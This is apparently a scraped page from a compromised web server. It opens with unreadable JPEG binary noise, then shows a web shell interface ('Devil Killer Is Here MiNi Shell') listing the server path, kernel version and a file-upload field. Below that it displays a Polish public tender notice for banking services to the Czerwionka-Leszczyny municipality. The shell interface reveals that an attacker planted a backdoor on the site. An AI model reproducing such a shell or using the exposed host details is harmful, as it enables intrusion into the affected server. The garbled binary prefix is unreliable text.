JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211123/0027954102-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Obsługa bankowa budżetu Gminy i Miasta Czerwionka-Leszczyny </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA I MIASTO CZERWIONKA-LESZCZYNY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258530</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Parkowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czerwionka-Leszczyny</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@czerwionka-leszczyny.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.czerwionka-leszczyny.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Obsługa bankowa budżetu Gminy i Miasta Czerwionka-Leszczyny </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-555f9fea-4b80-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00279541</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000053/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Obsługa bankowa Gminy i Miasta Czerwionka-Leszczyny </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami może odbywać się przy użyciu: <br/><br/>1)	miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ lub<br/>2)	ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal lub<br/>3)	poczty elektronicznej: zp@czerwionka-leszczyny.com.pl lub<br/>4)	strony internetowej prowadzonego postępowania: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu, musi posiadać konto na ePUAP. <br/>Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji” dostępnych na ePUAP i udostępnionych również na miniPortalu.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>Korzystnie przez Wykonawcę z miniPortalu jest jednoznaczne z akceptacją dokumentów, o których mowa powyżej. <br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. <br/>4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. <br/>Ponadto oświadczenie woli wyrażone w postaci elektronicznej, zostanie złożone Zamawiającemu z chwilą, gdy wprowadzone je do środka komunikacji elektronicznej w taki sposób, że Zamawiający mógł się zapoznać z jego treścią. <br/>5. Identyfikator postępowania stanowi załącznik Nr 5 do SWZ.<br/> Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. <br/>6. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452). <br/>7. Ofertę wraz z załącznikami należy sporządzić w formacie danych zgodnym z Rozporządzeniem Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>Informacje, oświadczenia lub dokumenty, inne niż określone powyżej, przekazywane w postępowaniu, sporządza się w postaci elektronicznej, w formatach danych zgodnych z Rozporządzeniem Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, o których mowa w SWZ.<br/>Zamawiający wskazuje jako pożądany format przesyłu danych: pdf. <br/>8. Pozostałe wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej – zgodnie z pkt 8 i 12 SWZ. <br/>9. Ofertę, składa się, pod rygorem nieważności, w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentowania Wykonawcy.<br/>10. Pozostałe informacje dotyczące użycia podpisu elektronicznego – zgodnie z pkt 12 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązki informacyjne o których mowa w art 13 ust 1-3<br/>Rozporządzenia Parlamentu Europejskiego i Rady UE 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) przez zamieszczenie wymaganych informacji w dokumentach zamówienia, w tym w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.15.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie prowadzenia bankowej obsługi budżetu Gminy i Miasta Czerwionka-Leszczyny w okresie od 1 lutego 2022 r. do 31 stycznia 2026 r., a w szczególności:<br/><br/>1)	otwarcie, prowadzenie i zamykanie rachunku bieżącego Gminy, rachunków VAT, rachunków bieżących i pomocniczych (w złotych polskich, w euro oraz innych walutach wymienialnych – w razie zaistnienia takiej potrzeby) Urzędu i jednostek organizacyjnych Gminy istniejących w dniu podpisania umowy oraz tworzonych w czasie trwania umowy, w oparciu o umowę na obsługę bankową Gminy i Miasta Czerwionka-Leszczyny (a także inne umowy wynikające z wewnętrznych przepisów Banku), zawarte z uwzględnieniem postanowień SWZ oraz warunków przedstawionych w ofercie Banku.<br/><br/>2)	oprocentowanie środków zgromadzonych na rachunkach bankowych (z wyjątkiem rachunku bankowego wadiów – nieoprocentowanego i bez kosztów), zastrzega się możliwość wyłączenia z oprocentowania środków na wskazanych odrębnie przez Zamawiającego rachunkach;<br/><br/>Wysokość oprocentowania środków na rachunkach stanowić będzie iloczyn wskaźnika korygującego banku i średniomiesięcznej stawki WIBID 1M z miesiąca poprzedzającego dany okres obrachunkowy. Średniomiesięczna stawka WIBID 1M liczona będzie jako średnia arytmetyczna stawek WIBID 1M z miesiąca poprzedzającego dany okres obrachunkowy.<br/><br/>3)	kapitalizowanie odsetek od środków na rachunkach bankowych w okresach miesięcznych;<br/><br/>4)	realizacja poleceń przelewów (elektronicznych i papierowych) w kraju i za granicę;<br/><br/>5)	świadczenie usługi płatności masowych;<br/><br/>6)	świadczenie nieodpłatnie następujących usług bankowych:<br/><br/>a)	przechowywanie środków pieniężnych,<br/>b)	obsługa wszystkich własnych operacji gotówkowych na wszystkich rachunkach bankowych Zamawiającego,<br/>c)	obsługa operacji bezgotówkowych pomiędzy rachunkami bankowymi Zamawiającego,<br/>d)	sporządzanie i przekazywanie za pośrednictwem systemu bankowości elektronicznej wyciągów z rachunków bankowych z informacją o zmianach stanu i ustaleniem salda rachunków,<br/>e)	udostępnienie (zainstalowanie, uruchomienie i korzystanie) usługi systemu bankowości elektronicznej (aktualnie Zamawiający korzysta z Systemu bankowości internetowej „OK@net” oraz „OK@net Mobile”) niezwłocznie w Urzędzie Gminy i Miasta oraz w tych jednostkach organizacyjnych, w których system ten jest użytkowany, a w uzgodnionych terminach we wszystkich pozostałych jednostkach organizacyjnych Zamawiającego, a także nie pobieranie opłat za użytkowanie systemu i przeszkolenie pracowników,<br/>f)	wydawanie i realizowanie czeków gotówkowych lub elektronicznych umożliwiających dokonywanie wypłat gotówkowych w jednostkach organizacyjnych gminy,<br/>g)	realizacja wpłat dokonywanych przez inne osoby i podmioty na rachunki zamawiającego,<br/>h)	wydawanie i umożliwienie korzystania z kart płatniczych;<br/><br/>7)	realizacja przelewów SORBNET<br/><br/>8)	udzielenie odnawialnego kredytu w rachunku bieżącym z przeznaczeniem na pokrycie występującego w ciągu roku przejściowego deficytu budżetu, do wysokości określonej w uchwałach budżetowych na kolejne lata budżetowe (dodatkowa coroczna umowa) przy czym w roku 2022 kwota ta wynosi 6.000.000,00 zł.<br/><br/>Ujemne saldo będzie mógł posiadać jedynie rachunek bieżący budżetu Gminy i Miasta Czerwionka-Leszczyny. Zabezpieczeniem kredytu będzie weksel in blanco wraz z deklaracją wekslową. Jedynym kosztem kredytu odnawialnego będzie jego oprocentowanie, bank (Wykonawca) nie będzie pobierał za przyznanie kredytu prowizji ani innych opłat związanych z jego obsługą. Odsetki będą naliczane tylko od wykorzystanej części kredytu, tzn. tylko wtedy gdy ujemne saldo na rachunku bieżącym budżetu Gminy i Miasta Czerwionka-Leszczyny wystąpi na koniec dnia. Spłata będzie następować automatycznie z wpływów na rachunek bieżący budżetu Gminy i Miasta Czerwionka-Leszczyny. Odsetki od kredytu będą naliczane w okresach miesięcznych, w ostatnim dniu roboczym miesiąca.<br/>Dzień roboczy oznacza każdy dzień inny niż sobota, niedziela lub inny dzień ustawowo wolny od pracy na podstawie przepisów prawa polskiego.<br/><br/>Oprocentowanie odnawialnego kredytu nastąpi wg stawki WIBOR 1M i marży banku. Marża banku w całym okresie obowiązywania umowy na obsługę bankową nie może ulec zmianie. Zmiana oprocentowania może nastąpić raz w miesiącu i musi być spowodowana zmianą stawki WIBOR 1 M obowiązującej w ostatnim dniu roboczym miesiąca poprzedniego. O zmianie oprocentowania Zamawiający winien być powiadomiony pisemnie.<br/><br/>2. Za otwarcie, obsługę i zamknięcie rachunków, prowadzenie na nich rozliczeń, realizację przelewów do innych banków oraz za świadczenie innych usług objętych obsługą bankową, Wykonawca nie będzie pobierał żadnych opłat oraz prowizji, poza miesięcznym wynagrodzeniem ryczałtowym w PLN. Wynagrodzenie ryczałtowe dotyczy obsługi bankowej Gminy i Miasta Czerwionka-Leszczyny, Urzędu Gminy i Miasta oraz wszystkich jednostek organizacyjnych objętych umową.<br/><br/>3. Ze względu na sprawność obsługi oraz konieczność konwojowania gotówki Zamawiający wymaga od Wykonawcy posiadania siedziby, oddziału lub filii (placówki) w dzielnicy Czerwionka lub jej otwarcie przed rozpoczęciem realizacji zamówienia.<br/>	Placówka w dzielnicy Czerwionka musi funkcjonować przez cały okres obowiązywania umowy na obsługę bankową.<br/>	Obowiązek posiadania siedziby, oddziału lub filii (placówki) w dzielnicy Czerwionka będzie uważać się za spełniony w przypadku posiadania takiej placówki przez Wykonawcę, wykonawcę wspólnie ubiegającego się o udzielenie zamówienia (np. członka konsorcjum) lub podwykonawcę przy równoczesnym spełnieniu warunku zapewnienia wpłat i wypłat gotówkowych Zamawiającego oraz wpłat i wypłat osób trzecich w placówce na terenie dzielnicy Czerwionka (bez żadnych opłat dla Zamawiającego lub jego Klientów). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66110000-4 - Usługi bankowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66113000-5 - Usługi udzielania kredytu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-02-01 do 2026-01-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Sposób oceny ofert:<br/><br/>1)	Kryterium Cena: <br/><br/>Na cenę oferty składają się podane w ofercie:<br/><br/>a)	wartość opłaty zryczałtowanej,<br/>b)	koszt kredytu w rachunku bieżącym.<br/><br/>Za oferowaną cenę maksymalnie można otrzymać 60 pkt.<br/><br/>Tę liczbę punktów otrzymuje oferta, spośród wszystkich ofert niepodlegających odrzuceniu, z najniższą ceną.<br/><br/>Pozostali Wykonawcy otrzymują ilość punktów wyliczoną wg poniższego wzoru:<br/><br/> Cn<br/>C = ______ x 100 x 60%<br/> Cw<br/><br/>gdzie: C - ilość punktów przyznanych ocenianej ofercie,<br/> Cn - najniższa zaoferowana cena, spośród wszystkich ofert niepodlegających odrzuceniu,<br/> Cw - cena danego Wykonawcy zaoferowana w badanej ofercie.<br/><br/>2)	Kryterium oprocentowanie środków na rachunkach bankowych<br/><br/>Za oferowaną najwyższą wartość wskaźnika korygującego dla środków na rachunkach bankowych maksymalnie można otrzymać 40 pkt.<br/><br/>Tę liczbę punktów otrzymuje oferta, spośród wszystkich ofert niepodlegających odrzuceniu, z najwyższą wartością wskaźnika korygującego dla środków na rachunkach bankowych.<br/><br/>Pozostali Wykonawcy otrzymują ilość punktów wyliczoną wg poniższego wzoru:<br/><br/> Ow<br/>O = ______ x 100 x 40 %<br/> On<br/>gdzie: <br/>O - ilość punktów przyznanych ocenianej ofercie,<br/>Ow - wartość wskaźnika korygującego danego Wykonawcy zaoferowana w badanej ofercie dla środków na rachunkach bankowych,<br/>On - najwyższa zaoferowana wartość wskaźnika korygującego dla środków na rachunkach bankowych, spośród wszystkich ofert niepodlegających odrzuceniu.<br/> <br/>2. Przy obliczaniu punków, o których mowa w pkt 1, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku wg. zasady, że trzecia cyfra po przecinku od 5 w górę powoduje zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po przecinku będzie mniejsza niż 5, to druga cyfra po przecinku nie ulegnie zmianie.<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana ta oferta, która spełni wszystkie wymagania określone w Specyfikacji Warunków Zamówienia i otrzyma największą łączną ilość punktów, wyliczoną zgodnie ze wzorem:	<br/><br/> P = C+ O<br/>gdzie:<br/>P = łączna ilość punktów przyznanych danej ofercie,<br/>C = ilość punktów przyznanych danej ofercie w kryterium cena,<br/>O = ilość punktów przyznanych danej ofercie w kryterium oprocentowanie środków na rachunkach bankowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">oprocentowanie środków na rachunkach bankowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunek udziału w postępowaniu dotyczący: zdolności do występowania w obrocie gospodarczym:<br/><br/>Zamawiający nie określa warunku udziału w postępowaniu dotyczącego zdolności do występowania w obrocie gospodarczym.<br/><br/>2. Warunek udziału w postępowaniu dotyczący: uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>2.1. Warunek udziału w postępowaniu dotyczący posiadania uprawień do prowadzenia określonej działalności gospodarczej lub zawodowej, zostanie spełniony, jeżeli Wykonawca posiada uprawnienia do wykonywania działalności bankowej to znaczy jest bankiem w rozumieniu art. 2 ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 2020 r. poz.1896 z późn. zm.).<br/><br/>2.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek określony w pkt 2.1 będzie spełniony, jeżeli każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia, o których mowa w pkt 2.1. <br/><br/>Warunek określony w pkt 2.1, będzie także spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia, o których mowa w pkt 2.1, i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (oświadczenie o którym mowa w art. 117 ust 4 ustawy Pzp) .<br/><br/>3. Warunek udziału w postępowaniu dotyczący: sytuacji ekonomicznej lub finansowej:<br/><br/>Zamawiający nie określa warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/><br/>4. Warunki udziału w postępowaniu dotyczące: zdolności technicznej lub zawodowej:<br/><br/>Zamawiający nie określa warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W przedmiotowym postępowaniu Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 21.2 SWZ, Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym przez siebie terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnego na dzień złożenia podmiotowego środka dowodowego tj. zezwolenia Komisji Nadzoru Finansowego na rozpoczęcie działalności bankowej, o którym mowa w art. 36 ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 2020 r. poz.1896 z późn. zm.), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo Bankowe 